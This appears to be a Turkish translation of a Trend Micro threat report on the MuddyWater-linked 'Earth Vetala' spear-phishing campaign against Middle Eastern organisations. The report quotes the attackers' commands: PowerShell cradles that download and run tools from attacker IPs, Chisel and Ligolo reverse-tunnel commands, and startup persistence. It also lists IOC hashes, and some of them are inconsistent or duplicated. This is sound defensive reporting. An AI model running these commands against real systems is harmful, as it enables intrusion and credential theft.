MuddyWater Saldırısı MENA’daki Kuruluşları Hedef Almaya Devam Ediyor

Trend Micro araştırmacıları kısa bir süre önce MuddyWater kaynaklı olduğundan şüphelenilen bir etkinlik tespit etti. Bu girişim, Orta Doğu’daki ve komşu bölgelerdeki çeşitli kuruluşları hedef alıyor.

Trend Micro araştırmacıları kısa bir süre önce Orta Doğu’daki ve komşu bölgelerdeki çeşitli kuruluşları hedef alan bir etkinlik tespit etti. Anomali şirketinin gerçekleştirdiği ve benzer kurbanları hedef alan farklı bir girişimi de ortaya çıkaran bir araştırma sonucunda bu etkinlikten haberdar olduk. Kesin olmamakla beraber, tespit edilen bu yeni etkinliğin MuddyWater (TEMP.Zagros, Static Kitten, Seedworm olarak da bilinmektedir) saldırısı ile bağlantılı olduğunu düşünüyoruz.

Ayrıca, Anomali şirketinin tespit ettiği etkinlik ve 2021 yılında da devam eden girişim arasında bir ilişki bulduk. Bu girişim aşağıdaki yasal uzaktan yönetim araçlarını kullanmaktadır:

Yetkisiz erişim elde etmeyi amaçlayan bu saldırılara Earth Vetala adını verdik. Earth Vetala saldırısında, kötü amaçlı paketleri göndermek için yasal dosya paylaşım hizmetlerine gömülü bağlantılar içeren hedefli kimlik avı e-postaları kullanıldı. Bu linkler e-postaların yanı sıra tuzak niteliğindeki belgelere de gömülmüştü.

Bir kurbana erişim sağlandığında, saldırganlar erişilen kullanıcı hesabının bir yöneticiye mi yoksa normal bir kullanıcıya mı ait olduğu belirleyebiliyordu. Sonrasında ise parola/işlem dökümü yardımcı araçlarının, ters tünel oluşturma araçlarının ve özel arka kapıların dahil olduğu saldırı sonrası araçları indiriyorlardı. Bu aşamalardan sonra tehdit aktörleri, karmaşık PowerShell komut dosyalarını yürütmek için ek komut ve kontrol (C&C) altyapılarını kullanarak iletişimi başlatıyordu.

Genel Bakış

Yapılan analizler, Earth Vetala girişiminin devam etmekte olduğunu ve bu tehdit faktörünün İran’ın hedeflerine uygun görünen çıkarlar içerdiğini gösteriyor.

Earth Vetala saldırısı başladığı günden beri Orta Doğu’daki ülkeleri hedef almaktadır. Bu girişimde Earth Vetala saldırısının tehdit aktörleri, hedefli kimlik avı e-postalarını ve tuzak niteliğindeki belgeleri kullanarak Birleşik Arap Emirlikleri, Suudi Arabistan, İsrail ve Azerbaycan’daki kuruluşları hedef almıştır. Bu kimlik avı e-postaları ve tuzak niteliğindeki belgeler, ScreenConnect uzak yönetici aracını içeren arşivleri dağıtmak için yasal dosya paylaşım hizmetlerine bağlanan gömülü URL’ler içerir. ScreenConnect, sistem yöneticilerine kurumsal sistemlerini uzaktan yönetme olanağı tanıyan yasal bir uygulamadır.

Yaptığımız araştırmada Anomali şirketinin tespit ettiği aynı girişimle bağlantılı tehdit aktörleri bulduk. Analizler, Earth Vetala saldırısının bu yazının yayınlandığı tarih itibariyle hala devam etmekte olduğunu gösteriyor. Bu girişimde tehdit aktörleri, parolaları ele geçirmek ve açık kaynaklı araçları kullanarak C&C iletişimlerine tünel oluşturmak için saldırı sonrası araçlarını; hedeflenen ana bilgisayarlar ve ortamlarda kalıcı bir varlık oluşturmak için ise ek C&C altyapısını kullanmaktadır.

Teknik Analiz

Araştırmamız sırasında, bir devlet kurumundan gönderildiği iddia edilen hedefli bir kimlik avı e-postası tespit ettik.

Şekil 1. Gömülü URL içeren kimlik avı e-postası

Bu e-posta, alıcıları URL’ye tıklamaları ve kötü amaçlı bir dosyayı indirmeleri için ikna etmeye çalışır. Biri .PDF dosyası ve diğeri .RTF dosyası olmak üzere iki dosyadan birinin indirilebileceğini gördük.

Tıpkı hedefli kimlik avı e-postasında olduğu gibi, tuzak niteliğindeki belgelerin içeriği de kurbanı başka bir kötü amaçlı URL’ye tıklaması ve bir .ZIP dosyasını indirmesi için ikna etmeye çalışır.

Bu .ZIP dosyası, RemoteUtilities tarafından geliştirilen yasal bir uzaktan yönetim yazılımının kopyasını içerir ve aşağıdakilerin de dahil olduğu uzaktan yönetim yeteneklerini sağlar:

  • Dosyaları indirme ve yükleme
  • Ekran görüntüleri alma
  • Dosyalara ve dizinlere göz atma
  • İşlemleri yürütme ve sonlandırma

Araştırmamızda, RemoteUtilities uzaktan yönetim yazılımını yukarıdaki yöntemle dağıtmak için kullanılan birden fazla .ZIP dosyasıyla karşılaştık. Bu dosyaların tümü aynı RemoteUtilities örneğini dağıtıyordu. Bu aracın kullanılması, ScreenConnect’in kullanıldığı daha önceki saldırılar gibi bu girişimi de diğer araştırmalardan ayırır. Aksi takdirde kullanımda olan TTP verileri genel olarak benzer kalacaktır.

RemoteUtilities Analizi

RemoteUtilities yazılımı yürütüldüğünde aşağıdaki komutla msiexec.exe uygulaması başlatılır:

pastedGraphic.png

Şekil 4. RemoteUtilities Kurulumu

MSI yükleyicisi, hedef makineye Uzak Yardımcı Programlar – Ana Bilgisayar adlı bir hizmet yükler:

pastedGraphic_1.png

Şekil 5. Uzak Yardımcı Programlar Hizmeti

Sonrasında, yüklenen hizmet RemoteUtilities’e ait olan id.remoteutilities.com etki alanıyla iletişim kurar. Bu bağlantı, etki alanındaki İnternet Kimliği Bağlantısı adı verilen bir özellikle ilgilidir. Bu özellik, bir ara İnternet sunucusunun tıpkı proxy sunucuları gibi bağlantıya aracılık etmesine olanak tanır. Böylece tehdit aktörü, sonrasında asıl RemoteUtilities ana bilgisayarına bağlanacak olan Internet-ID sunucusu ile bağlantı kurar.

pastedGraphic_2.png

Şekil 6. kod sunucusu bağlantısı

Saldırı Sonrası Analizi

Araştırmamızda, Suudi Arabistan’da bulunan ve ScreenConnect uzaktan yönetim yazılımını kullanan güvenliği ihlal edilmiş bir ana bilgisayar tespit ettik. Kurbanlar yürütülebilir bir ScreenConnect dosyası (SHA256 karması: 2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf) içeren kötü amaçlı bir .ZIP dosyası (SHA256 karması: b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf) ile hedeflenmişti

Yukarıda da belirttiğimiz gibi, bu ScreenConnect yürütülebilir dosyası, instance-sy9at2-relay.screenconnect.com adresinde bulunan ve 51.68.244.39’a çözümlenen internet kimliği sunucusuna bağlanır.

Söz konusu etki alanına bir önceki araştırmamızda da değinmiştik. Daha sonrasında ise bu tehdit aktörlerinin ScreenConnect yazılımını kullanarak güvenliği ihlal edilmiş ana bilgisayarla aşağıdaki komutları çalıştırarak etkileşimde kurduğunu gözlemledik.

cmd.exe net kullanıcı/etki alanı

Yukarıdaki komut, saldırganın etki alanı denetleyicisindeki tüm kullanıcılara erişmesini sağlar.

Yürütülen bir sonraki komut ise şudur:

powershell.exe -exec bypass -w 1 -file a.ps1

Bu, bazı türdeki PowerShell komut dosyalarını yürütmek için kullanılan bir komuttur. Fakat bu a.ps1 dosyasına erişimimiz yoktu. Bu yüzden burada hangi işlevin sağlandığı konusunda net bir bilgimiz yok.

Gönderilen bir diğer komut da şudur:

powershell.exe iwr -uri http://87.236.212[.]184/SharpChisel.exe -outfile c:\programdata\SharpChisel.exe -usebasicparsing

Bu komut 187.236.212[.]184’e bağlanır ve SharpChisel.exe (SHA256: 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2) adlı bir dosyayı indirerek bunu C:\programdata dizinine kaydeder. SharpChisel ismi, bu dosyanın amacıyla ilişkili olabilir. Dosyanın hedefi, “chisel” olarak adlandırılan bir tünel oluşturma aracına yönelik C# sarmalayıcısıdır. Yukarıdaki IP adresi, İran’daki bir sunucuya konumlandırılmıştır.

Bir sonraki aşamada aşağıdaki komut SharpChisel’i yapılandırır:

C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999

Bu işlem, tüm trafiği 9999 bağlantı noktasındaki yerel ana bilgisayarla aynı uzak sunucuya yönlendirir.

Ardından farklı ayarlara sahip başka bir SharpChisel örneği, bu defa aşağıdaki komut satırını kullanarak PowerShell ile yürütülür:

powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:443 R:8888:127.0.0.1:9999

Bu sefer trafik, sunucuya 443 numaralı bağlantı noktası üzerinden iletilecektir.

23.95.215.100:8080 konumunda farklı bir C&C sunucusuna bağlanan üçüncü bir SharpChisel örneği aşağıdaki komutla başlatılır:

C:\programdata\SharpChisel.exe client 23.95.215[.]100:8080 r:8888:127.0.0.1:9999

Sonrasında bu komut aşağıdaki PowerShell komut satırı ile yapılandırılır:

powershell.exe C:\programdata\SharpChisel.exe client 23.95.215[.]100:8080 R:8888:127.0.0.1:9999

Söz konusu tehdit aktörünün SharpChisel’i düzgün çalışacak şekilde yapılandıramadığını düşünüyoruz. Aşağıdaki komutun kullanılması, bize bu varsayımımızı destekleyecek ek bir gerekçe sunuyor:

powershell.exe iwr -uri hxxp://87.236.212[.]184/procdump64.exe -outfile c:\programdata\procdump64.exe -usebasicparsing

Bu komut C&C sunucusuna bağlanır, procdump64.exe dosyasını indirir ve bunu C:\programdata dizinine kaydeder. Bu da SharpChisel’in düzgün bir şekilde yapılandırılamadığına ilişkin varsayımımızı desteklemektedir. Saldırgan procdump64.exe yardımcı programını indirmek ve çalıştırmak için bu dosya yerine PowerShell’i kullanır.

pastedGraphic_3.png

Şekil 7. LIGOLO yürütme örneği

Bu işlem iki farklı komut kullanılarak yapılır:

C:\programdate\1.exe -relayserver 87.236.212[.]184:5555

C:\users\public\new.exe -relayserver 87.236.212[.]184:5555

Bu işlemin sonrasında tehdit aktörünün aşağıdaki komutu kullanarak SharpChisel’i birkaç kez tekrar kullanmaya çalıştığını görüyoruz:

C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999
powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 R:8888:127.0.0.1:9999

İki farklı araç kullanılarak denenmesine rağmen C&C sunucusuna yönelik bir tünel bağlantısının kurulamadığı sonucuna vardık.

C&C sunucularına yönelik tünel bağlantısını yapılandırma girişimin başarısız olmasının ardından, tehdit aktörleri bir uzaktan erişim aracı (RAT) indirerek bunu yapılandırmayı denedi. Bunun için aşağıdaki PowerShell komutu kullanıldı:

powershell.exe iwr -uri hxxp://87.236.212[.]184/out1 -outfile c:\users\public\out1.exe -usebasicparsing

Bu komut, out1.exe dosyasını indirir ve C:\users\public\ dizinine kaydeder. Bir UPX paket açıcı kullanarak yürütülebilir bir Python dosyasını içeren dosya içeriğini ayıklamayı başardık. Ardından, Python bytecode dosyalarının tümünü almak için pyinstxtractor.py kullanarak yürütülebilir python dosyasının derlemesini açtık. Bunlar sonraki aşamada orijinal phyton kodunu elde etmek için easypythondecompiler kullanılarak kaynak koda dönüştürülür.

out1.exe RAT aşağıdaki yeteneklere sahiptir:

  • Veri kodlaması
  • E-posta ayrıştırma
  • Dosya ve kayıt defteri kopyalama
  • HTTP/S bağlantısı desteği
  • Yerel komut satırı
  • İşlem yapma ve dosya yürütme

Bu aşamanın ardından C:\users\public\Browser64.exe dosyası çalıştırılır. Browser64, aşağıdaki uygulamalardan kimlik bilgilerini alan bir araçtır:

  • Chrome
  • Chromium
  • Firefox
  • Opera
  • Internet Explorer
  • Outlook
pastedGraphic_4.png

Şekil 8. Browser64.exe Kullanım Örneği

Browser64.exe kullanıldıktan sonra aşağıdaki komutun çalıştırıldığını gözlemledik:

powershell.exe iex(new-object System.Net.WebClient).DownloadString(‘hxxp://23.94.50[.]197:444/index.jsp/deb2b1a127c472229babbb8dc2dca1c2/QPKb49mivezAdai1’)

Bu aşamada saldırganlar SharpChisel’i tekrar kullanmayı denedi ve başarısız oldu:

powershell.exe C:\programdata\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999

C:\programdata\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999

C:\programdata\SharpChisel.exe server -p 9999 –socks5

Son olarak, aşağıdaki komutlar kullanılarak bir kalıcılık mekanizmasının oluşturulduğunu gözlemledik:

cmd.exe /c Wscript.exe “C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\news.js”

cmd.exe /c “C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\newsblog.js”

newsblog.js‘nin bir kopyasını elde etmeyi başardık. Bu dosya, aşağıdaki URL ile iletişim kuran basit bir VBS indirme programıdır:

hxxp://23[.]95[.]215[.]100:8008/index.jsp/7e95a3d753cc4a17793ef9513e030b49/4t2Fg7k6wWRnKgd9

pastedGraphic_5.png

Şekil 9. newsblog.js

Bu komut dosyası yeni bir HTTP nesnesi oluşturur ve sonrasında sistemin yerel proxy ayarlarını devre dışı bırakmaya çalışır. Bu işlemin ardından komut dosyası C&C URL’sinde bir HTTP GET isteği uygular, sunucunun yanıtını alır ve 10 saniye boyunca uyku moduna geçer.

Analizimiz esnasında bu sunucu hala kullanılabiliyordu. Sunucudan gelen yanıt, bellekte çalıştırılan kodlanmış bir PowerShell komut dosyasını içerir. Bu komut dosyasının kaynak koda dönüştürülmesi sonucunda bir arka kapı içerdiği ortaya çıkmıştır:

pastedGraphic_6.png

Şekil 10. gizliliği kaldırılmış PowerShell arka kapısı

Yukarıdaki ekran görüntüsü, bellek içerisindeki PowerShell arka kapısının kısaltılmış bir görüntüsünü göstermektedir. PowerShell arka kapısı aşağıdaki yeteneklere sahiptir.

  • Skype bağlantısını kontrol etme
  • Skype’ı indirme ve yükleme
  • C2 bağdaştırıcısı ile kodlanmış iletişim
  • C2 sunucusundan gönderilen komutları yürütme
  • Çok faktörlü kimlik doğrulama ayarlarını alma
  • Mevcut oturum açmış kullanıcı ve işletim sistemi sürümü bilgilerini alma

Earth Vetala Saldırısının Ayak İzi

Earth Vetala saldırısı, birden çok ülkeyi hedef alan kapsamlı bir girişim gerçekleştirmiştir. Bu saldırının aşağıdaki ülkelerde gerçekleştirildiğini gözlemledik:

  • Azerbaycan
  • Bahreyn
  • İsrail
  • Suudi Arabistan
  • Birleşik Arap Emirlikleri
pastedGraphic_7.png

Şekil 11. Etkilenen ülkeler

Earth Vetala saldırısının aşağıdaki sektörleri hedeflediğini gözlemledik:

  • Devlet Kurumları
  • Akademi
  • Turizm

Trend Micro Çözümleri

Earth Vetala saldırısı ilginç bir tehdit niteliğindedir. Bu saldırı uzaktan erişim yeteneklerine sahip olsa da saldırganların bu araçların tamamını kullanabilecek uzmanlıkta olmadığı görülmektedir. Saldırının MuddyWater tehdit aktörleriyle bağlantılı olduğunu düşünüyoruz. Saldırganların diğer bağlantılı girişimlerde gösterdiği yüksek teknik beceriler göz önünde bulundurulduğunda, bu oldukça beklenmedik bir durum.

Bu alanda elde ettiğimiz bulgulara Özel İstihbarat Araştırma (DIR) analistlerimiz sayesinde ulaştık. Analistlerimiz, kuruluşların önemli kararlar almasına ve karşılaştıkları güvenlik sorunlarının temeli anlamasına yardımcı olmak için her zaman yardıma hazırdır. Özel İstihbarat Araştırma hizmetimiz hakkında daha fazla bilgi edinmek için lütfen bölgenizdeki Satış ekibimiz ile iletişime geçin.

MITRE ATT&CK Teknik Eşlemesi

TaktikTeknik
Kaynak GeliştirmeAltyapı Edinme: Web Hizmetleri – T1583.006
İlk ErişimKimlik Avı: Hedefli Kimlik Avı Eki – T1566.001 Kimlik Avı: Hedefli Kimlik Avı Bağlantısı – T1566.002
YürütmeKomut ve Komut Dosyası Yorumlayıcı: PowerShell – T1059.001 Komut ve Komut Dosyası Yorumlayıcı: Windows Command Shell – T1059.003 Komut ve Komut Dosyası Yorumlayıcı: Visual Basic – T1059.005 Kullanıcı Yürütmesi: Kötü Amaçlı Bağlantı – T1204.001 Kullanıcı Yürütmesi: Kötü Amaçlı Dosya – T1204.002
Kalıcı, Ayrıcalık YükseltmeÖnyüklemeyi veya Oturum Açmayı Otomatik Başlatma İşlemini Yürütme: Kayıt Defteri Çalıştırma Anahtarları / Başlangıç Klasörü – T1547.001
KeşifHesap Keşfi: Etki Alanı Hesabı – T1087.002
Kimlik Bilgilerine ErişimParola Depolarından Gelen Kimlik Bilgileri: Web Tarayıcılarından Gelen Kimlik Bilgileri – T1555.003
Komut ve DenetimVeri Kodlama: Standart Kodlama – T1132.001
Savunma Sistemlerini AtlatmaDosyaların veya Bilgilerin Gizliliğini Kaldırma/Kodunu Çözme – T1140

Gizliliğin Tehlikeye Girmesine İlişkin Göstergeler

Dosyalar

Dosya adıSHA-256Trend Micro Algılama AdıAçıklama
SharpChisel.exe61f83466b512eb12fc82441259a5205f076254546,a7726a2e3e983011898e4e2HackTool.MSIL.Chisel.ASharpChisel tünel oluşturma aracı
PD64.dllccdddd1ebf3c5de2e68b4dcb8fbc7d4ed32e8f39f6fdf71ac022a7b4d0aa4131Trojan.Win64.PASSDUMP.AHackTool.Win64.PassDump.AC tarafından kullanılan dosya
PasswordDumper.exe0cd6f593cc58ba3ac40f9803d97a6162a308ec3caa53e1ea1ce7f977f2e667d3HackTool.Win64.PassDump.ACParola dökümü aracı
out1.exe79fd822627b72bd2fbe9eae43cf98c99c2ecaa5649b7a3a4cfdc3ef8f977f2e6HackTool.Win64.Lazagne.AGPyinstaller uzak erişim aracı
newsblog.js304ea86131c4d105d35ebbf2784d44ea24f0328fb483db29b7ad5ffe514454f8Trojan.JS.DLOADR.AUSUOLVBS indirme programı
new.exefb414beebfb9ecbc6cb9b35c1d2adc48102529d358c7a8997e903923f7eda1a2HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
Browser64.exe3495b0a6508f1af0f95906efeba36148296dccd2ab8ffb4e569254b683584feaHackTool.Win64.BrowserDumper.ATarayıcı veritabanlarına erişim aracı
1.exe78b1ab1b8196dc236fa6ad4014dd6add142b3cab583e116da7e8886bc47a7347HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
مکتبة إلکترونیة.pdf70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1bTrojan.PDF.RemoteUtilities.AGömülü URL’ler içeren PDF dosyası

468e331fd3f9c41399e3e90f6fe033379ab69ced5e11b35665790d4a4b7cf254Trojan.W97M.RemoteUtilities.AGömülü URL’ler içeren RTF dosyası
مکتبة إلکترونیة .zipf865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتبة إلکترونیة.exef664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376PUA.Win32.RemoteUtilities.ARemoteUtilities uzak erişim yazılımı
برنامج.zip8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212fPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
برنامجدولیة.zip9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
ورش مجانية.zip5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990ddPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتالمنحالدراسیة.zipb2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcfPUA.Win32.ScreenConnect.PScreenConnect içeren arşiv
المنح الدرایةس.exe3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32bPUA.Win32.ScreenConnect.PScreenConnect uzak erişim yazılımı
Dosya adıSHA-256Trend Micro Algılama AdıAçıklama
SharpChisel.exe61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2HackTool.MSIL.Chisel.ASharpChisel tünel oluşturma aracı
PD64.dllccdddd1ebf3c5de2e68b4dcb8fbc7d4ed32e8f39f6fdf71ac022a7b4d0aa4131Trojan.Win64.PASSDUMP.AHackTool.Win64.PassDump.AC tarafından kullanılan dosya
PasswordDumper.exe0cd6f593cc58ba3ac40f9803d97a6162a308ec3caa53e1ea1ce7f977f2e667d3HackTool.Win64.PassDump.ACParola dökümü aracı
out1.exe79fd822627b72bd2fbe9eae43cf98c99c2ecaa5649b7a3a4cfdc3ef8f977f2e6HackTool.Win64.Lazagne.AGPyinstaller uzak erişim aracı
newsblog.js304ea86131c4d105d35ebbf2784d44ea24f0328fb483db29b7ad5ffe514454f8Trojan.JS.DLOADR.AUSUOLVBS indirme programı
new.exefb414beebfb9ecbc6cb9b35c1d2adc48102529d358c7a8997e903923f7eda1a2HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
Browser64.exe3495b0a6508f1af0f95906efeba36148296dccd2ab8ffb4e569254b683584feaHackTool.Win64.BrowserDumper.ATarayıcı veritabanlarına erişim aracı
1.exe78b1ab1b8196dc236fa6ad4014dd6add142b3cab583e116da7e8886bc47a7347HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
مکتبة إلکترونیة.pdf70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1bTrojan.PDF.RemoteUtilities.AGömülü URL’ler içeren PDF dosyası

468e331fd3f9c41399e3e90f6fe033379ab69ced5e11b35665790d4a4b7cf254Trojan.W97M.RemoteUtilities.AGömülü URL’ler içeren RTF dosyası
مکتبة إلکترونیة .zipf865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتبة إلکترونیة.exef664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376PUA.Win32.RemoteUtilities.ARemoteUtilities uzak erişim yazılımı
برنامج.zip8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212fPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
برنامجدولیة.zip9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
ورش مجانية.zip5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990ddPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتالمنحالدراسیة.zipb2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcfPUA.Win32.ScreenConnect.PScreenConnect içeren arşiv
المنح الدرایةس.exe3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32bPUA.Win32.ScreenConnect.PScreenConnect uzak erişim yazılımı

  • 23.94.50.197:444
  • 23.95.215.100:443
  • 23.95.215.100:8080
  • 87.236.212.184:443
  • 87.236.212.184:8008

Yazan: Adi Peretz, Erick Thek

5 Mart 2021

Bir cevap yazın

This site uses Akismet to reduce spam. Learn how your comment data is processed.